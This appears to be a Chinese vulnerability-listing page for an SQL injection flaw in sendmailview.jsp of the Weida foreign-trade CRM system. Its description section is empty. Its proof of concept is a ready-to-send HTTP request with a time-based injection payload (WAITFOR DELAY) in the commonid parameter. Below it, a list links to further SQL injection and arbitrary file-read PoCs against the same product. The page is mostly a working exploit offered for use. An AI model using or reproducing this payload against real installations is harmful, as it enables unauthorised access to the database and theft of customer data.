维达外贸客户关系管理系统 sendmailview.jsp存在SQL注入漏洞

漏洞描述

PoC代码

GET /wap/common/sendmailview.jsp?commonid=1';WAITFOR+DELAY+'0:0:4'-- HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36 Edg/[REDACTED]

相关漏洞推荐

• POC 维达外贸客户关系管理系统 UserView.jsp SQL注入漏洞
• POC 维达外贸客户关系管理系统 sendmailRun1.jsp SQL注入漏洞
• 维达外贸客户关系管理系统 AccountPassword SQL注入漏洞
• 维达外贸客户关系管理系统 FileDowload 任意文件读取漏洞
• 维达外贸客户关系管理系统 LodopDown 任意文件读取漏洞
• POC 维达外贸客户关系管理系统FileDowload存在任意文件读取漏洞
• 维达外贸客户关系管理系统 AccountSelect SQL注入漏洞
• POC 维达外贸客户关系管理系统LodopDown存在任意文件读取漏洞
• 维达外贸客户关系管理系统AccountAction.jsp存在SQL注入漏洞
• 维达外贸客户关系管理系统AccountPassword.jsp存在SQL注入漏洞
• POC 维达外贸客户关系管理系统 AccountSelect 存在SQL注入漏洞